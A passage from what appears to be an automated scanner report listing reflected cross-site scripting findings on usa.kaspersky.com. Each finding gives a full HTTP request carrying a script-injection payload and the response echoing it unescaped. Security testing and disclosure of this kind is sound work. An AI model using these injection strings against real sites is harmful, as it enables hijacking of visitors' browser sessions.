Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f909e"><script>alert(1)</script>6f2d209b2fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/tablet-security?f909e"><script>alert(1)</script>6f2d209b2fa=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141855"
Content-Type: text/html; charset=utf-8
Content-Length: 49516
Date: Sun, 04 Sep 2011 13:11:06 GMT
X-Varnish: 1163130082
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-security?f909e"><script>alert(1)</script>6f2d209b2fa=1" />
...[SNIP]...

1.138. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ff9"><script>alert(1)</script>485f603b1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145440"
Content-Type: text/html; charset=utf-8
Content-Length: 31618
Date: Sun, 04 Sep 2011 14:10:47 GMT
X-Varnish: 1163255930
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html" />
...[SNIP]...

1.139. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3acc"-alert(1)-"75ba5310b70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:04 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145464"
Content-Type: text/html; charset=utf-8
Content-Length: 30280
Date: Sun, 04 Sep 2011 14:11:20 GMT
X-Varnish: 1163256816
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.140. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56241"><script>alert(1)</script>8fdcf2dfe51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145516"
Content-Type: text/html; charset=utf-8
Content-Length: 31952
Date: Sun, 04 Sep 2011 14:11:59 GMT
X-Varnish: 1163258668
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51" />
...[SNIP]...

1.141. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8f2"-alert(1)-"38af26a7928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145536"
Content-Type: text/html; charset=utf-8
Content-Length: 30620
Date: Sun, 04 Sep 2011 14:12:21 GMT
X-Varnish: 1163259536
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.142. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f13"-alert(1)-"3296f683bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145291"
Content-Type: text/html; charset=utf-8
Content-Length: 37369
Date: Sun, 04 Sep 2011 14:08:24 GMT
X-Varnish: 1163250338
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.143. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a644"><script>alert(1)</script>0a50e7eee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145252"
Content-Type: text/html; charset=utf-8
Content-Length: 37589
Date: Sun, 04 Sep 2011 14:07:40 GMT
X-Varnish: 1163248700
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1" />
...[SNIP]...

1.144. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83184"><script>alert(1)</script>569acb540ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources83184"><script>alert(1)</script>569acb540ba/knowledge-center/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141816"
Content-Type: text/html; charset=utf-8
Content-Length: 32071
Date: Sun, 04 Sep 2011 13:10:25 GMT
X-Varnish: 1163129143
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources83184"><script>alert(1)</script>569acb540ba/knowledge-center/whitepapers" />
...[SNIP]...

1.145. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efae4"-alert(1)-"adf5365208a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resourcesefae4"-alert(1)-"adf5365208a/knowledge-center/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141844"
Content-Type: text/html; charset=utf-8
Content-Length: 30725
Date: Sun, 04 Sep 2011 13:10:52 GMT
X-Varnish: 1163129840
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resourcesefae4"-alert(1)-"adf5365208a/knowledge-center/whitepapers";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.146. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9159e"-alert(1)-"b59df5b2090 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center9159e"-alert(1)-"b59df5b2090/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141949"
Content-Type: text/html; charset=utf-8
Content-Length: 30295
Date: Sun, 04 Sep 2011 13:12:33 GMT
X-Varnish: 1163132425
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center9159e"-alert(1)-"b59df5b2090/whitepapers";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.147. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395c"><script>alert(1)</script>3905b3800ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-centerb395c"><script>alert(1)</script>3905b3800ed/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141925"
Content-Type: text/html; charset=utf-8
Content-Length: 31633
Date: Sun, 04 Sep 2011 13:12:15 GMT
X-Varnish: 1163131686
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-centerb395c"><script>alert(1)</script>3905b3800ed/whitepapers" />
...[SNIP]...

1.148. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40126"><script>alert(1)</script>4d4c1686dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/whitepapers40126"><script>alert(1)</script>4d4c1686dd3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:19 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141999"
Content-Type: text/html; charset=utf-8
Content-Length: 33350
Date: Sun, 04 Sep 2011 13:13:24 GMT
X-Varnish: 1163134304
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/whitepapers40126"><script>alert(1)</script>4d4c1686dd3" />
...[SNIP]...

1.149. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e91be"-alert(1)-"12aebe11698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/whitepaperse91be"-alert(1)-"12aebe11698 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142019"
Content-Type: text/html; charset=utf-8
Content-Length: 31873
Date: Sun, 04 Sep 2011 13:13:44 GMT
X-Varnish: 1163134991
Age: 0
Via: 1.1 varnish
Connection: keep-alive
